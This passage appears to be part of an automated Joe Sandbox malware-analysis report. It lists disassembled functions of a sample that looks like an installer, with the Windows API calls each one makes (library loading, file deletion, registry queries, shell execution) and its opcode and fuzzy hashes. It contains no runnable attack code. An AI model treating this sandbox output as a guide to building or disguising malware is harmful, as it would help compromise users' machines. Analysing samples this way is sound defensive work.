                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 334405425-0
                                                                                                                                                                                              • Opcode ID: 72a5e19f9697d1318c9a310d29b5b60265bfdb2e952e74c10cb73e1909f0eb38
                                                                                                                                                                                              • Instruction ID: 3abd81b96889d1c7eb1cceed2e7b5e281284f1a6e6a9a5ff44b88a827c8e1d1c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 72a5e19f9697d1318c9a310d29b5b60265bfdb2e952e74c10cb73e1909f0eb38
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821B071D00205AACF20AFA5CE48A9E7A70BF04358F60413BF511B11E0DBBD8981DA6E
                                                                                                                                                                                              Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GlobalFree.KERNELBASE(00770720), ref: 00401BE7
                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                              • String ID: ExecShellAsUser
                                                                                                                                                                                              • API String ID: 3394109436-869331269
                                                                                                                                                                                              • Opcode ID: 0ee5b69d2cfb3a0a2e0f3aae0319e9b1983c649d140d642359d16bc307d41886
                                                                                                                                                                                              • Instruction ID: 2ffc4b8e8b305263ff1bfe934f744a2e7f0909984677ca7ca3d2d917788d1148
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ee5b69d2cfb3a0a2e0f3aae0319e9b1983c649d140d642359d16bc307d41886
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52210A76600100ABCB10FF95CE8499E73A8EB48318BA4443FF506F32D0DB78A852DB6D
                                                                                                                                                                                              Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004065FD: FindFirstFileW.KERNELBASE(004DF000,00468298,00464250,00405CE0,00464250,00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420), ref: 00406608
                                                                                                                                                                                                • Part of subcall function 004065FD: FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 00402299
                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1486964399-0
                                                                                                                                                                                              • Opcode ID: 29d6f0bed4bd2d50b69dd1226e545e03bb95794d8620927361660d91590f24b0
                                                                                                                                                                                              • Instruction ID: edc96df04b91ed766a503f65766f364d086ea8d205cfe5bb15309c141496b913
                                                                                                                                                                                              • Opcode Fuzzy Hash: 29d6f0bed4bd2d50b69dd1226e545e03bb95794d8620927361660d91590f24b0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 57117071900318A6DB10EFF98E4999EB7B8AF04344F50443FB805F72D1D6B8C4419B59
                                                                                                                                                                                              Function 00405984 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00405D8B: GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
                                                                                                                                                                                                • Part of subcall function 00405D8B: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DA4
                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B66), ref: 0040599F
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405B66), ref: 004059A7
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059BF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                                                                              • Opcode ID: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
                                                                                                                                                                                              • Instruction ID: 825022a906987a8d14f11fb4079f6fb6242afe5a54bc5f1377d2c32e3c215ab4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 280825f6b60181aa2d378306bbdc3da53de5ab3d89a200e418c4f7b9ea6af3cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E0E5B1119F5096D21067349A0CB5B2AA4DF86334F05093AF891F11C0DB3844068EBE
                                                                                                                                                                                              Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(?,?,00464250,?,00405CAE,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420,00000000), ref: 00405C48
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004D3000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                                                                              • Opcode ID: 125bac33416d21a80fc522b842b933099275dd0dd1ea66691da55d5ffdcd1f5d
                                                                                                                                                                                              • Instruction ID: 536d45c59d08a7b21130d9dbd5b0e10796a041e4a40079992e14d28e29d42f71
                                                                                                                                                                                              • Opcode Fuzzy Hash: 125bac33416d21a80fc522b842b933099275dd0dd1ea66691da55d5ffdcd1f5d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2211E231504505EBCF30AFA1CD0159F36A0EF14369B28493BFA45B22F1DB3E8A919B5E
                                                                                                                                                                                              Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                                                                              • Opcode ID: 8c6ae37f0c00b40db9a7f0b8771259aad396ca2ebfe9c6ecab15c5ec5bd387db
                                                                                                                                                                                              • Instruction ID: 1206e07bb255176646816810ef0290bee69920d7ecde6c9ccbb84b14c6b4306b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c6ae37f0c00b40db9a7f0b8771259aad396ca2ebfe9c6ecab15c5ec5bd387db
                                                                                                                                                                                              • Instruction Fuzzy Hash: E311A771D10205EBDF14DFA4CA585AE77B4EF44348B20843FE505B72C0D6B89A41EB5E
                                                                                                                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                              • Opcode ID: be076caaca7df3d109edefedbdc7bfa3a965653d784c315eb79774cf5cfe89e5
                                                                                                                                                                                              • Instruction ID: ea42f58d7670a619ed9131e80823b54190387dbc53765a55c310ef4228f9fff3
                                                                                                                                                                                              • Opcode Fuzzy Hash: be076caaca7df3d109edefedbdc7bfa3a965653d784c315eb79774cf5cfe89e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF0128316202109BE7095B789E04B2A3798E710315F10463FF855F62F1D6B8CC829B5C
                                                                                                                                                                                              Function 004053F5 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405405
                                                                                                                                                                                                • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                              • CoUninitialize.COMBASE(00000404,00000000), ref: 00405451
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2896919175-0
                                                                                                                                                                                              • Opcode ID: a1f8c397b5266fa352d60afbf9b4c77fa9abc53c67a054b05b22dcb893a39c3f
                                                                                                                                                                                              • Instruction ID: 7813e2a1ccdf537c56c01956b79198a0443dbd649336f33e6835a7e221d2fb99
                                                                                                                                                                                              • Opcode Fuzzy Hash: a1f8c397b5266fa352d60afbf9b4c77fa9abc53c67a054b05b22dcb893a39c3f
                                                                                                                                                                                              • Instruction Fuzzy Hash: ABF090B25406009BE7015B549D01BAB7760EFD431AF05443EFF89B22E0D77948928E6E
                                                                                                                                                                                              Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$EnableShow
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1136574915-0
                                                                                                                                                                                              • Opcode ID: 87f8232cb56b7a5d6ce9856bfa50bd061077f9975d19b3a51d23438555d97d86
                                                                                                                                                                                              • Instruction ID: fc8c1c2e7d4a5a8f9e35cd12a8e681b154a8316ed36a6d041aa31def844ca7e2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87f8232cb56b7a5d6ce9856bfa50bd061077f9975d19b3a51d23438555d97d86
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61E01A72E082008FE724ABA5AA495AD77B4EB90365B20847FE211F11D1DA7858819F6A
                                                                                                                                                                                              Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
